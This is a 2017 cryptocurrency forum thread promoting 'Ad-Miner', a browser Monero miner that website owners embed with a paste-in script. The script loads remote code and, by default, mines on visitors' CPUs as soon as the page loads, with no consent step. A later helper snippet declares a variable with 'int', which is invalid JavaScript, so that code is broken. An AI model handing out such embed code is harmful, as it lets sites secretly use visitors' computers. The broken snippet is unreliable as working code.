Bitcoin Forum
June 22, 2024, 04:49:28 AM *
News: Voting for pizza day contest
 
   Home   Help Search Login Register More  
Pages: [1] 2 »  All
  Print  
Author Topic: Ad-Miner(CoinHive Alternative)  (Read 1257 times)
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 03:21:08 PM
Last edit: November 08, 2017, 05:17:10 PM by CineXMike
 #1

Hi,

Today i introduce Ad-Miner,

Its the cheapest web-miner on the internet at this moment,
with only a 5% commision instead of a 10-30% commision.
You also mine directly at a stratum pool instead of a closed pool(https://supportxmr.com/#/dashboard),
therefore you also don't need to register at our site. you can directly copy and paste the code below and start running.

Current Payout:
0.00020625857 per 1M hashes
08-11-17

Overview:
  • No need to register
  • Only a 5% commision
  • Directly view you mining stats at the pools dashboard!

Usage:
We recommend using it with max 4 threads and throttle at 0.3 to not freeze your clients computer(Only change if you know what you're doing.

Code:
<script src="http://ad-miner.com/lib/miner.min.js"></script>
<script>
            // Start miner
            var miner = AdMiner.Anonymous('YourMoneroAdress',{ threads: 4, throttle: 0.3 });
            miner.start();
</script>

Added support for listening hooks,

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

Site: http://ad-miner.com

Greetings,
Mike
felicita
Legendary
*
Offline Offline

Activity: 1582
Merit: 1031



View Profile
November 08, 2017, 03:33:59 PM
 #2

ok looks great only 5 % fees  Wink
but how can i make a start button for minig so users can self choose if they wanna burn there cpu or not Cheesy


kind regards
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 03:39:41 PM
 #3

ok looks great only 5 % fees  Wink
but how can i make a start button for minig so users can self choose if they wanna burn there cpu or not Cheesy


kind regards

I'll add support for that as soon as possible,
I think i can finish that tonight.
tomos81
Hero Member
*****
Offline Offline

Activity: 952
Merit: 504



View Profile
November 08, 2017, 03:44:50 PM
 #4

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

▄███████████████████████▄
█████████████████████████
█████████████████████████
█████████████████████████
▀████████████████████████
░████████████████████████
░████████████████████████
░████████████████████████
░███████████████████████▀
░███████████████████████
░███████████████████████
████████████████████████
▀███████▀▀█████▀▀██████▀
| 
 Low Fidelity - High Potential 
|
▄███████████████████▄
█████████████████████
███▄░▄░███████▀▄███
█████▄▀█▄▀███▀▄██████
███████░██░▀▄████████
████████▄▀█▄▀████████
████████▀▄▀██░███████
██████▀▄███░██▄▀█████
████▀▄██████▄▀▀░▀████

█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
███████████████████
██████▀░░▀▀▀░░▀██████
█████░░▄▄░░░▄▄░░█████
████▌░░██▌░▐██░░▐████
████░░░░▀░░░▀░░░░████
████▄▄░▀▄▄▄▄▄▀░▄▄████

█████████████████████
█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
██████████████▀▀███
███████████▀▀░░░░████
███████▀▀░░▄▄▀░░▐████
████▀░░░▄██▀░░░░█████
███████░█▀░░░░░▐█████
████████░░▄▄░░░██████
██████████████▄██████

█████████████████████
▀███████████████████▀
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 04:04:49 PM
 #5

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?
The mining pool has a 0.3 threshold.

My script works with accepted shares,
Instead of hashes,

Ill ADD amount of accepted shares trigger function.
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 05:06:28 PM
 #6

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?
zuzoovn
Newbie
*
Offline Offline

Activity: 48
Merit: 0


View Profile
November 08, 2017, 05:13:18 PM
 #7

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?


current payout Huh XMR per 1M hashes
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 05:16:24 PM
 #8

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?


current payout Huh XMR per 1M hashes


Aprox 0.00020625857 per 1M Hashes
tomos81
Hero Member
*****
Offline Offline

Activity: 952
Merit: 504



View Profile
November 08, 2017, 05:26:25 PM
 #9

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

▄███████████████████████▄
█████████████████████████
█████████████████████████
█████████████████████████
▀████████████████████████
░████████████████████████
░████████████████████████
░████████████████████████
░███████████████████████▀
░███████████████████████
░███████████████████████
████████████████████████
▀███████▀▀█████▀▀██████▀
| 
 Low Fidelity - High Potential 
|
▄███████████████████▄
█████████████████████
███▄░▄░███████▀▄███
█████▄▀█▄▀███▀▄██████
███████░██░▀▄████████
████████▄▀█▄▀████████
████████▀▄▀██░███████
██████▀▄███░██▄▀█████
████▀▄██████▄▀▀░▀████

█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
███████████████████
██████▀░░▀▀▀░░▀██████
█████░░▄▄░░░▄▄░░█████
████▌░░██▌░▐██░░▐████
████░░░░▀░░░▀░░░░████
████▄▄░▀▄▄▄▄▄▀░▄▄████

█████████████████████
█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
██████████████▀▀███
███████████▀▀░░░░████
███████▀▀░░▄▄▀░░▐████
████▀░░░▄██▀░░░░█████
███████░█▀░░░░░▐█████
████████░░▄▄░░░██████
██████████████▄██████

█████████████████████
▀███████████████████▀
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 05:30:39 PM
 #10

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>
tomos81
Hero Member
*****
Offline Offline

Activity: 952
Merit: 504



View Profile
November 08, 2017, 05:36:29 PM
 #11

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

▄███████████████████████▄
█████████████████████████
█████████████████████████
█████████████████████████
▀████████████████████████
░████████████████████████
░████████████████████████
░████████████████████████
░███████████████████████▀
░███████████████████████
░███████████████████████
████████████████████████
▀███████▀▀█████▀▀██████▀
| 
 Low Fidelity - High Potential 
|
▄███████████████████▄
█████████████████████
███▄░▄░███████▀▄███
█████▄▀█▄▀███▀▄██████
███████░██░▀▄████████
████████▄▀█▄▀████████
████████▀▄▀██░███████
██████▀▄███░██▄▀█████
████▀▄██████▄▀▀░▀████

█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
███████████████████
██████▀░░▀▀▀░░▀██████
█████░░▄▄░░░▄▄░░█████
████▌░░██▌░▐██░░▐████
████░░░░▀░░░▀░░░░████
████▄▄░▀▄▄▄▄▄▀░▄▄████

█████████████████████
█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
██████████████▀▀███
███████████▀▀░░░░████
███████▀▀░░▄▄▀░░▐████
████▀░░░▄██▀░░░░█████
███████░█▀░░░░░▐█████
████████░░▄▄░░░██████
██████████████▄██████

█████████████████████
▀███████████████████▀
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 05:44:49 PM
 #12

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.
tomos81
Hero Member
*****
Offline Offline

Activity: 952
Merit: 504



View Profile
November 08, 2017, 05:48:37 PM
 #13

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up Smiley

▄███████████████████████▄
█████████████████████████
█████████████████████████
█████████████████████████
▀████████████████████████
░████████████████████████
░████████████████████████
░████████████████████████
░███████████████████████▀
░███████████████████████
░███████████████████████
████████████████████████
▀███████▀▀█████▀▀██████▀
| 
 Low Fidelity - High Potential 
|
▄███████████████████▄
█████████████████████
███▄░▄░███████▀▄███
█████▄▀█▄▀███▀▄██████
███████░██░▀▄████████
████████▄▀█▄▀████████
████████▀▄▀██░███████
██████▀▄███░██▄▀█████
████▀▄██████▄▀▀░▀████

█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
███████████████████
██████▀░░▀▀▀░░▀██████
█████░░▄▄░░░▄▄░░█████
████▌░░██▌░▐██░░▐████
████░░░░▀░░░▀░░░░████
████▄▄░▀▄▄▄▄▄▀░▄▄████

█████████████████████
█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
██████████████▀▀███
███████████▀▀░░░░████
███████▀▀░░▄▄▀░░▐████
████▀░░░▄██▀░░░░█████
███████░█▀░░░░░▐█████
████████░░▄▄░░░██████
██████████████▄██████

█████████████████████
▀███████████████████▀
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 06:37:49 PM
 #14

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up Smiley

May i ask your current hashrate on coinhive?
tomos81
Hero Member
*****
Offline Offline

Activity: 952
Merit: 504



View Profile
November 08, 2017, 07:25:34 PM
 #15

hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up Smiley

May i ask your current hashrate on coinhive?

it's variable, but ~40M hashes / week, and growing

▄███████████████████████▄
█████████████████████████
█████████████████████████
█████████████████████████
▀████████████████████████
░████████████████████████
░████████████████████████
░████████████████████████
░███████████████████████▀
░███████████████████████
░███████████████████████
████████████████████████
▀███████▀▀█████▀▀██████▀
| 
 Low Fidelity - High Potential 
|
▄███████████████████▄
█████████████████████
███▄░▄░███████▀▄███
█████▄▀█▄▀███▀▄██████
███████░██░▀▄████████
████████▄▀█▄▀████████
████████▀▄▀██░███████
██████▀▄███░██▄▀█████
████▀▄██████▄▀▀░▀████

█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
███████████████████
██████▀░░▀▀▀░░▀██████
█████░░▄▄░░░▄▄░░█████
████▌░░██▌░▐██░░▐████
████░░░░▀░░░▀░░░░████
████▄▄░▀▄▄▄▄▄▀░▄▄████

█████████████████████
█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
██████████████▀▀███
███████████▀▀░░░░████
███████▀▀░░▄▄▀░░▐████
████▀░░░▄██▀░░░░█████
███████░█▀░░░░░▐█████
████████░░▄▄░░░██████
██████████████▄██████

█████████████████████
▀███████████████████▀
tomos81
Hero Member
*****
Offline Offline

Activity: 952
Merit: 504



View Profile
November 08, 2017, 08:50:11 PM
 #16

Right now I've got:
38184.6 h/s - 2026 users mining

What you're offering is very lucrative, but I've based my code on CH's code and it would take me a lot of time to implement it. Ugh.

I'd suggest people move from CH to this service, since you'd be earning +25% of what CH offers you.
Plus, it runs stratum


hi mex, only problem is, that i cannot solve, OP has not token based user verification, and the method how measure user hashes, is very easily hackable  , just press F12=>console and call event when miner finds a share...  so be careful of the idea to replace coinhive with this service...
i suggest to OP , change hash and accepted share verification to something more secure (public+private API key or so...  something like coinhive)




hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up Smiley

May i ask your current hashrate on coinhive?

it's variable, but ~40M hashes / week, and growing

▄███████████████████████▄
█████████████████████████
█████████████████████████
█████████████████████████
▀████████████████████████
░████████████████████████
░████████████████████████
░████████████████████████
░███████████████████████▀
░███████████████████████
░███████████████████████
████████████████████████
▀███████▀▀█████▀▀██████▀
| 
 Low Fidelity - High Potential 
|
▄███████████████████▄
█████████████████████
███▄░▄░███████▀▄███
█████▄▀█▄▀███▀▄██████
███████░██░▀▄████████
████████▄▀█▄▀████████
████████▀▄▀██░███████
██████▀▄███░██▄▀█████
████▀▄██████▄▀▀░▀████

█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
███████████████████
██████▀░░▀▀▀░░▀██████
█████░░▄▄░░░▄▄░░█████
████▌░░██▌░▐██░░▐████
████░░░░▀░░░▀░░░░████
████▄▄░▀▄▄▄▄▄▀░▄▄████

█████████████████████
█████████████████████
▀███████████████████▀

▄███████████████████▄
█████████████████████
██████████████▀▀███
███████████▀▀░░░░████
███████▀▀░░▄▄▀░░▐████
████▀░░░▄██▀░░░░█████
███████░█▀░░░░░▐█████
████████░░▄▄░░░██████
██████████████▄██████

█████████████████████
▀███████████████████▀
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 08, 2017, 09:10:10 PM
 #17

Right now I've got:
38184.6 h/s - 2026 users mining

What you're offering is very lucrative, but I've based my code on CH's code and it would take me a lot of time to implement it. Ugh.

I'd suggest people move from CH to this service, since you'd be earning +25% of what CH offers you.
Plus, it runs stratum


hi mex, only problem is, that i cannot solve, OP has not token based user verification, and the method how measure user hashes, is very easily hackable  , just press F12=>console and call event when miner finds a share...  so be careful of the idea to replace coinhive with this service...
i suggest to OP , change hash and accepted share verification to something more secure (public+private API key or so...  something like coinhive)




hi, add to script trigger, to call anothwr function when N shares accepted  from local miner (multiples of 256 shares like in the coinhive)
if you will be able to do that, i will bring you a lot of hashes

also question:  i added my mymonero address to script (i am testing it)..  when the payout is processed?

First start the miner, then put this in same page

Code:
<script>
        miner.on('accepted', function() { console.log('Share accepted!')})
</script>

I hope this is what you wanted?

can i tell to this function, to run some other function when 1024 shares accepted? (page refresh, insert shares to db etc?)

Yes you can but instead of of running it on 1024 you should run it on 2 shares like this
Code:
<script>
        int counter = 0;
        miner.on('accepted', function() { if(counter >= 2){counter = 0; otherFunction(); } else { counter++; }})
</script>

thanks a lot, i will add it to my game (signature) soon.
2 more questions (yes i am boring):
- can you make some user interface where we can check our balances?  based on miner address , etc?
- your script above: counter>2   it means 1 increment = 512 hashes?

You can acces user interface on mining pool,
https://supportxmr.com/#/dashboard
Scroll down and enter your wallet adress.
There you can see your stats.

And yes 1 share equals around 512 hashes.

thanks, that's enough for me to know, i will add this miner to my website within 24 hours..  Good job, keep it up Smiley

May i ask your current hashrate on coinhive?

it's variable, but ~40M hashes / week, and growing
I'll add token based verification soon.
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 10, 2017, 09:47:05 AM
 #18

Added multi server support,
Now you dont have to worry about server downtime, that costs you money.
botgabe
Full Member
***
Offline Offline

Activity: 229
Merit: 100


View Profile
November 10, 2017, 11:12:45 PM
 #19

Threat = 2 and throttle = 0,30 hashrate = 20, Threat = 4 and throttle = 0,50 hashrate = 20   !!!! What is the problem?
Thats your maxim you get with your pc Wink


Mike, we need Api ! Since many of us pay our users to use the miner (and dont hide it) we need to check somehow the users hashes
CineXMike (OP)
Newbie
*
Offline Offline

Activity: 54
Merit: 0


View Profile
November 11, 2017, 09:40:08 AM
 #20

Threat = 2 and throttle = 0,30 hashrate = 20, Threat = 4 and throttle = 0,50 hashrate = 20   !!!! What is the problem?
Thats your maxim you get with your pc Wink


Mike, we need Api ! Since many of us pay our users to use the miner (and dont hide it) we need to check somehow the users hashes


Api will be released tonight/tomorrow,
I am doing some last finishing touches.


Greetings,
Mike
Pages: [1] 2 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!